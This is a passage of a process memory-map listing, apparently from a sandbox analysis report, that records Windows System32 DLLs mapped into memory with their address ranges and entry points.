"c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 893 start_va = 0x7fffb9010000 end_va = 0x7fffb902ffff monitored = 0 entry_point = 0x7fffb9018480 region_type = mapped_file name = "windows.staterepositorybroker.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryBroker.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorybroker.dll") Region: id = 894 start_va = 0x7fffb97a0000 end_va = 0x7fffb9848fff monitored = 0 entry_point = 0x7fffb97a9a00 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 895 start_va = 0x7fffb9a00000 end_va = 0x7fffb9a58fff monitored = 0 entry_point = 0x7fffb9a0daa0 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 896 start_va = 0x7fffb9af0000 end_va = 0x7fffb9c0cfff monitored = 0 entry_point = 0x7fffb9b0dc60 region_type = mapped_file name = "windows.security.authentication.web.core.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.Web.Core.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.web.core.dll") Region: id = 897 start_va = 0x7fffb9e60000 end_va = 0x7fffb9f47fff monitored = 0 entry_point = 0x7fffb9eaf5b0 region_type = mapped_file name = "windows.cloudstore.schema.shell.dll" filename = "\\Windows\\System32\\Windows.CloudStore.Schema.Shell.dll" (normalized: "c:\\windows\\system32\\windows.cloudstore.schema.shell.dll") Region: id = 898 start_va = 0x7fffb9f50000 end_va = 0x7fffb9f86fff monitored = 0 entry_point = 0x7fffb9f58c10 region_type = mapped_file name = "appextension.dll" filename = "\\Windows\\System32\\AppExtension.dll" (normalized: "c:\\windows\\system32\\appextension.dll") Region: id = 899 start_va = 0x7fffb9f90000 end_va = 0x7fffba01ffff monitored = 0 entry_point = 0x7fffb9ff2720 region_type = mapped_file name = "appresolver.dll" filename = "\\Windows\\System32\\AppResolver.dll" (normalized: "c:\\windows\\system32\\appresolver.dll") Region: id = 900 start_va = 0x7fffba1a0000 end_va = 0x7fffba2b6fff monitored = 0 entry_point = 0x7fffba1fcbc0 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 901 start_va = 0x7fffba530000 end_va = 0x7fffba55bfff monitored = 0 entry_point = 0x7fffba54b730 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\System32\\dbgcore.dll" (normalized: "c:\\windows\\system32\\dbgcore.dll") Region: id = 902 start_va = 0x7fffba560000 end_va = 0x7fffba743fff monitored = 0 entry_point = 0x7fffba57a770 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 903 start_va = 0x7fffba7f0000 end_va = 0x7fffbac8dfff monitored = 0 entry_point = 0x7fffba841e80 region_type = mapped_file name = "cdp.dll" filename = "\\Windows\\System32\\cdp.dll" (normalized: "c:\\windows\\system32\\cdp.dll") Region: id = 904 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 905 start_va = 0x7fffbae40000 end_va = 0x7fffbae5cfff monitored = 0 entry_point = 0x7fffbae46080 region_type = mapped_file name = "windows.shell.servicehostbuilder.dll" filename = "\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll" (normalized: "c:\\windows\\system32\\windows.shell.servicehostbuilder.dll") Region: id = 906 start_va = 0x7fffbae80000 end_va = 0x7fffbae91fff monitored = 0 entry_point = 0x7fffbae83330 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 907 start_va = 0x7fffbaf10000 end_va = 0x7fffbaf2cfff monitored = 0 entry_point = 0x7fffbaf128d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 908 start_va = 0x7fffbb250000 end_va = 0x7fffbb308fff monitored = 0 entry_point = 0x7fffbb25d080 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 909 start_va = 0x7fffbb330000 end_va = 0x7fffbb523fff monitored = 0 entry_point = 0x7fffbb3b4bf0 region_type = mapped_file name = "windows.cloudstore.dll" filename = "\\Windows\\System32\\Windows.CloudStore.dll" (normalized: "c:\\windows\\system32\\windows.cloudstore.dll") Region: id = 910 start_va = 0x7fffbbfb0000 end_va = 0x7fffbc02ffff monitored = 0 entry_point = 0x7fffbbfb90a0 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 911 start_va = 0x7fffbc040000 end_va = 0x7fffbc06efff monitored = 0 entry_point = 0x7fffbc059ea0 region_type = mapped_file name = "storageusage.dll" filename = "\\Windows\\System32\\StorageUsage.dll" (normalized: "c:\\windows\\system32\\storageusage.dll") Region: id = 912 start_va = 0x7fffbc070000 end_va = 0x7fffbc09afff monitored = 0 entry_point = 0x7fffbc076c40 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 913 start_va = 0x7fffbc1b0000 end_va = 0x7fffbc35dfff monitored = 0 entry_point = 0x7fffbc1f5290 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 914 start_va = 0x7fffbc6b0000 end_va = 0x7fffbc86bfff monitored = 0 entry_point = 0x7fffbc6db1f0 region_type = mapped_file name = "cdprt.dll" filename = "\\Windows\\System32\\cdprt.dll" (normalized: "c:\\windows\\system32\\cdprt.dll") Region: id = 915 start_va = 0x7fffbc8e0000 end_va = 0x7fffbc90dfff monitored = 0 entry_point = 0x7fffbc8fa9a0 region_type = mapped_file name = "windowsinternal.composableshell.desktophosting.dll" filename = "\\Windows\\System32\\WindowsInternal.ComposableShell.DesktopHosting.dll" (normalized: "c:\\windows\\system32\\windowsinternal.composableshell.desktophosting.dll") Region: id = 916 start_va = 0x7fffbca30000 end_va = 0x7fffbca4ffff monitored = 0 entry_point = 0x7fffbca47360 region_type = mapped_file name = "devdispitemprovider.dll" filename = "\\Windows\\System32\\DevDispItemProvider.dll" (normalized: "c:\\windows\\system32\\devdispitemprovider.dll") Region: id = 917 start_va = 0x7fffbca50000 end_va = 0x7fffbca94fff monitored = 0 entry_point = 0x7fffbca5aef0 region_type = mapped_file name = "mswb7.dll" filename = "\\Windows\\System32\\MSWB7.dll" (normalized: "c:\\windows\\system32\\mswb7.dll") Region: id = 918 start_va = 0x7fffbcaa0000 end_va = 0x7fffbcb4bfff monitored = 0 entry_point = 0x7fffbcacd6a0 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 919 start_va = 0x7fffbcb50000 end_va = 0x7fffbcbd6fff monitored = 0 entry_point = 0x7fffbcb5e4d0 region_type = mapped_file name = "windows.devices.enumeration.dll" filename = "\\Windows\\System32\\Windows.Devices.Enumeration.dll" (normalized: "c:\\windows\\system32\\windows.devices.enumeration.dll") Region: id = 920 start_va = 0x7fffbcd40000 end_va = 0x7fffbcdc2fff monitored = 0 entry_point = 0x7fffbcd440e0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 921 start_va = 0x7fffbce00000 end_va = 0x7fffbce33fff monitored = 0 entry_point = 0x7fffbce1f490 region_type = mapped_file name = "ethernetmediamanager.dll" filename = "\\Windows\\System32\\EthernetMediaManager.dll" (normalized: "c:\\windows\\system32\\ethernetmediamanager.dll") Region: id = 922 start_va = 0x7fffbceb0000 end_va = 0x7fffbcf92fff monitored = 0 entry_point = 0x7fffbcec49e0 region_type = mapped_file name = "windows.applicationmodel.dll" filename = "\\Windows\\System32\\Windows.ApplicationModel.dll" (normalized: "c:\\windows\\system32\\windows.applicationmodel.dll") Region: id = 923 start_va = 0x7fffbcfe0000 end_va = 0x7fffbd0a5fff monitored = 0 entry_point = 0x7fffbd013f00 region_type = mapped_file name = "windows.storage.search.dll" filename = "\\Windows\\System32\\Windows.Storage.Search.dll" (normalized: "c:\\windows\\system32\\windows.storage.search.dll") Region: id = 924 start_va = 0x7fffbd0b0000 end_va = 0x7fffbd11cfff monitored = 0 entry_point = 0x7fffbd0d6a60 region_type = mapped_file name = "networkuxbroker.dll" filename = "\\Windows\\System32\\NetworkUXBroker.dll" (normalized: "c:\\windows\\system32\\networkuxbroker.dll") Region: id = 925 start_va = 0x7fffbd150000 end_va = 0x7fffbd629fff monitored = 0 entry_point = 0x7fffbd21c180 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 926 start_va = 0x7fffbd860000 end_va = 0x7fffbd8e6fff monitored = 0 entry_point = 0x7fffbd86cad0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 927 start_va = 0x7fffbd920000 end_va = 0x7fffbda65fff monitored = 0 entry_point = 0x7fffbd927620 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryps.dll") Region: id = 928 start_va = 0x7fffbe540000 end_va = 0x7fffbe567fff monitored = 0 entry_point = 0x7fffbe542110 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 929 start_va = 0x7fffbe670000 end_va = 0x7fffbe6ecfff monitored = 0 entry_point = 0x7fffbe673a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 930 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 931 start_va = 0x7fffbebf0000 end_va = 0x7fffbec00fff monitored = 0 entry_point = 0x7fffbebf3900 region_type = mapped_file name = "windows.staterepositorycore.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryCore.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorycore.dll") Region: id = 932 start_va = 0x7fffbee80000 end_va = 0x7fffbef30fff monitored = 0 entry_point = 0x7fffbeec6e10 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 933 start_va = 0x7fffbef40000 end_va = 0x7fffbf4c5fff monitored = 0 entry_point = 0x7fffbef97790 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 934 start_va = 0x7fffbf570000 end_va = 0x7fffbf5b2fff monitored = 0 entry_point = 0x7fffbf571810 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 935 start_va = 0x7fffbf5c0000 end_va = 0x7fffbf698fff monitored = 0 entry_point = 0x7fffbf5c53c0 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 936 start_va = 0x7fffbf6a0000 end_va = 0x7fffbf81ffff monitored = 0 entry_point = 0x7fffbf6c7430 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 937 start_va = 0x7fffbf910000 end_va = 0x7fffbf919fff monitored = 0 entry_point = 0x7fffbf911f00 region_type = mapped_file name = "mobilenetworking.dll" filename = "\\Windows\\System32\\mobilenetworking.dll" (normalized: "c:\\windows\\system32\\mobilenetworking.dll") Region: id = 938 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 939 start_va = 0x7fffbf9b0000 end_va = 0x7fffbf9e3fff monitored = 0 entry_point = 0x7fffbf9d2260 region_type = mapped_file name = "comppkgsup.dll" filename = "\\Windows\\System32\\CompPkgSup.dll" (normalized: "c:\\windows\\system32\\comppkgsup.dll") Region: id = 940 start_va = 0x7fffbf9f0000 end_va = 0x7fffbfa6cfff monitored = 0 entry_point = 0x7fffbf9f3320 region_type = mapped_file name = "windows.media.devices.dll" filename = "\\Windows\\System32\\Windows.Media.Devices.dll" (normalized: "c:\\windows\\system32\\windows.media.devices.dll") Region: id = 941 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 942 start_va = 0x7fffbffe0000 end_va = 0x7fffbffebfff monitored = 0 entry_point = 0x7fffbffe1690 region_type = mapped_file name = "nlmproxy.dll" filename = "\\Windows\\System32\\nlmproxy.dll" (normalized: "c:\\windows\\system32\\nlmproxy.dll") Region: id = 943 start_va = 0x7fffc0120000 end_va = 0x7fffc0189fff monitored = 0 entry_point = 0x7fffc0122350 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 944 start_va = 0x7fffc0190000 end_va = 0x7fffc0214fff monitored = 0 entry_point = 0x7fffc01b0b70 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 945 start_va = 0x7fffc0340000 end_va = 0x7fffc03e0fff monitored = 0 entry_point = 0x7fffc0343970 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 946 start_va = 0x7fffc03f0000 end_va = 0x7fffc0403fff monitored = 0 entry_point = 0x7fffc03f37a0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 947 start_va = 0x7fffc0510000 end_va = 0x7fffc057bfff monitored = 0 entry_point = 0x7fffc052ec00 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 948 start_va = 0x7fffc06c0000 end_va = 0x7fffc06dcfff monitored = 0 entry_point = 0x7fffc06c29b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 949 start_va = 0x7fffc0700000 end_va = 0x7fffc07adfff monitored = 0 entry_point = 0x7fffc074b570 region_type = mapped_file name = "textshaping.dll" filename = "\\Windows\\System32\\TextShaping.dll" (normalized: "c:\\windows\\system32\\textshaping.dll") Region: id = 950 start_va = 0x7fffc07b0000 end_va = 0x7fffc07c6fff monitored = 0 entry_point = 0x7fffc07b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 951 start_va = 0x7fffc1190000 end_va = 0x7fffc1335fff monitored = 0 entry_point = 0x7fffc11bf1b0 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\System32\\Windows.Globalization.dll" (normalized: "c:\\windows\\system32\\windows.globalization.dll") Region: id = 952 start_va = 0x7fffc1340000 end_va = 0x7fffc15bdfff monitored = 0 entry_point = 0x7fffc13d73a0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 953 start_va = 0x7fffc15c0000 end_va = 0x7fffc17acfff monitored = 0 entry_point = 0x7fffc163ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 954 start_va = 0x7fffc1820000 end_va = 0x7fffc1956fff monitored = 0 entry_point = 0x7fffc1843b60 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 955 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 956 start_va = 0x7fffc1c10000 end_va = 0x7fffc2ccffff monitored = 0 entry_point = 0x7fffc1f59f90 region_type = mapped_file name = "windows.ui.xaml.dll" filename = "\\Windows\\System32\\Windows.UI.Xaml.dll" (normalized: "c:\\windows\\system32\\windows.ui.xaml.dll") Region: id = 957 start_va = 0x7fffc2cd0000 end_va = 0x7fffc2cfcfff monitored = 0 entry_point = 0x7fffc2cd7cd0 region_type = mapped_file name = "bcp47mrm.dll" filename = "\\Windows\\System32\\BCP47mrm.dll" (normalized: "c:\\windows\\system32\\bcp47mrm.dll") Region: id = 958 start_va = 0x7fffc2d00000 end_va = 0x7fffc2d2cfff monitored = 0 entry_point = 0x7fffc2d17ec0 region_type = mapped_file name = "languageoverlayutil.dll" filename = "\\Windows\\System32\\LanguageOverlayUtil.dll" (normalized: "c:\\windows\\system32\\languageoverlayutil.dll") Region: id = 959 start_va = 0x7fffc2d30000 end_va = 0x7fffc2e80fff monitored = 0 entry_point = 0x7fffc2d48050 region_type = mapped_file name = "inputhost.dll" filename = "\\Windows\\System32\\InputHost.dll" (normalized: "c:\\windows\\system32\\inputhost.dll") Region: id = 960 start_va = 0x7fffc2e90000 end_va = 0x7fffc2f8bfff monitored = 0 entry_point = 0x7fffc2ecae50 region_type = mapped_file name = "textinputframework.dll" filename = "\\Windows\\System32\\TextInputFramework.dll" (normalized: "c:\\windows\\system32\\textinputframework.dll") Region: id = 961 start_va = 0x7fffc2f90000 end_va = 0x7fffc30dbfff monitored = 0 entry_point = 0x7fffc2fc1ac0 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 962 start_va = 0x7fffc30e0000 end_va = 0x7fffc31d3fff monitored = 0 entry_point = 0x7fffc3121eb0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 963 start_va = 0x7fffc3220000 end_va = 0x7fffc3279fff monitored = 0 entry_point = 0x7fffc32363c0 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 964 start_va = 0x7fffc3280000 end_va = 0x7fffc32eefff monitored = 0 entry_point = 0x7fffc328a850 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 965 start_va = 0x7fffc3300000 end_va = 0x7fffc3339fff monitored = 0 entry_point = 0x7fffc33051c0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 966 start_va = 0x7fffc3340000 end_va = 0x7fffc338ffff monitored = 0 entry_point = 0x7fffc3342520 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 967 start_va = 0x7fffc33c0000 end_va = 0x7fffc33d0fff monitored = 0 entry_point = 0x7fffc33c12e0 region_type = mapped_file name = "credui.dll" filename = "\\Windows\\System32\\credui.dll" (normalized: "c:\\windows\\system32\\credui.dll") Region: id = 968 start_va = 0x7fffc33e0000 end_va = 0x7fffc3443fff monitored = 0 entry_point = 0x7fffc341ca70 region_type = mapped_file name = "useroobe.dll" filename = "\\Windows\\System32\\oobe\\UserOOBE.dll" (normalized: "c:\\windows\\system32\\oobe\\useroobe.dll") Region: id = 969 start_va = 0x7fffc3450000 end_va = 0x7fffc34a0fff monitored = 0 entry_point = 0x7fffc347cd20 region_type = mapped_file name = "cloudexperiencehostbroker.dll" filename = "\\Windows\\System32\\CloudExperienceHostBroker.dll" (normalized: "c:\\windows\\system32\\cloudexperiencehostbroker.dll") Region: id = 970 start_va = 0x7fffc34b0000 end_va = 0x7fffc34d9fff monitored = 0 entry_point = 0x7fffc34bf730 region_type = mapped_file name = "windows.internal.system.userprofile.dll" filename = "\\Windows\\System32\\Windows.Internal.System.UserProfile.dll" (normalized: "c:\\windows\\system32\\windows.internal.system.userprofile.dll") Region: id = 971 start_va = 0x7fffc34e0000 end_va = 0x7fffc354efff monitored = 0 entry_point = 0x7fffc3523190 region_type = mapped_file name = "fhcfg.dll" filename = "\\Windows\\System32\\fhcfg.dll" (normalized: "c:\\windows\\system32\\fhcfg.dll") Region: id = 972 start_va = 0x7fffc3590000 end_va = 0x7fffc35a8fff monitored = 0 entry_point = 0x7fffc3592110 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 973 start_va = 0x7fffc35b0000 end_va = 0x7fffc35ebfff monitored = 0 entry_point = 0x7fffc35b68a0 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 974 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 975 start_va = 0x7fffc3780000 end_va = 0x7fffc37e4fff monitored = 0 entry_point = 0x7fffc3793640 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 976 start_va = 0x7fffc3820000 end_va = 0x7fffc385afff monitored = 0 entry_point = 0x7fffc3841b10 region_type = mapped_file name = "dxcore.dll" filename = "\\Windows\\System32\\DXCore.dll" (normalized: "c:\\windows\\system32\\dxcore.dll") Region: id = 977 start_va = 0x7fffc3860000 end_va = 0x7fffc3f55fff monitored = 0 entry_point = 0x7fffc3dfec40 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 978 start_va = 0x7fffc3f60000 end_va = 0x7fffc3fb3fff monitored = 0 entry_point = 0x7fffc3f6dee0 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 979 start_va = 0x7fffc3fc0000 end_va = 0x7fffc40b7fff monitored = 0 entry_point = 0x7fffc3fd73e0 region_type = mapped_file name = "appxdeploymentclient.dll" filename = "\\Windows\\System32\\AppXDeploymentClient.dll" (normalized: "c:\\windows\\system32\\appxdeploymentclient.dll") Region: id = 980 start_va = 0x7fffc43b0000 end_va = 0x7fffc43c8fff monitored = 0 entry_point = 0x7fffc43b51e0 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 981 start_va = 0x7fffc43d0000 end_va = 0x7fffc446ffff monitored = 0 entry_point = 0x7fffc43d4570 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 982 start_va = 0x7fffc4610000 end_va = 0x7fffc464cfff monitored = 0 entry_point = 0x7fffc461b030 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 983 start_va = 0x7fffc4780000 end_va = 0x7fffc4795fff monitored = 0 entry_point = 0x7fffc4784250 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 984 start_va = 0x7fffc48e0000 end_va = 0x7fffc48f0fff monitored = 0 entry_point = 0x7fffc48e3670 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 985 start_va = 0x7fffc4a20000 end_va = 0x7fffc51b0fff monitored = 0 entry_point = 0x7fffc4a35f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Region: id = 986 start_va = 0x7fffc5270000 end_va = 0x7fffc5280fff monitored = 0 entry_point = 0x7fffc5276a80 region_type = mapped_file name = "coloradapterclient.dll" filename = "\\Windows\\System32\\coloradapterclient.dll" (normalized: "c:\\windows\\system32\\coloradapterclient.dll") Region: id = 987 start_va = 0x7fffc5290000 end_va = 0x7fffc533dfff monitored = 0 entry_point = 0x7fffc529b110 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\System32\\mscms.dll" (normalized: "c:\\windows\\system32\\mscms.dll") Region: id = 988 start_va = 0x7fffc53b0000 end_va = 0x7fffc53f6fff monitored = 0 entry_point = 0x7fffc53c30b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 989 start_va = 0x7fffc5400000 end_va = 0x7fffc55b3fff monitored = 0 entry_point = 0x7fffc54768b0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 990 start_va = 0x7fffc56c0000 end_va = 0x7fffc58c1fff monitored = 0 entry_point = 0x7fffc572d800 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 991 start_va = 0x7fffc58d0000 end_va = 0x7fffc5970fff monitored = 0 entry_point = 0x7fffc58e01b0 region_type = mapped_file name = "windowmanagementapi.dll" filename = "\\Windows\\System32\\WindowManagementAPI.dll" (normalized: "c:\\windows\\system32\\windowmanagementapi.dll") Region: id = 992 start_va = 0x7fffc5980000 end_va = 0x7fffc59e9fff monitored = 0 entry_point = 0x7fffc5988c30 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 993 start_va = 0x7fffc5c40000 end_va = 0x7fffc5c49fff monitored = 0 entry_point = 0x7fffc5c41780 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 994 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 995 start_va = 0x7fffc6370000 end_va = 0x7fffc65d2fff monitored = 0 entry_point = 0x7fffc63eb0b0 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 996 start_va = 0x7fffc65e0000 end_va = 0x7fffc66d4fff monitored = 0 entry_point = 0x7fffc6622860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 997 start_va = 0x7fffc66e0000 end_va = 0x7fffc6703fff monitored = 0 entry_point = 0x7fffc66e3de0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 998 start_va = 0x7fffc6710000 end_va = 0x7fffc673cfff monitored = 0 entry_point = 0x7fffc6715010 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 999 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: 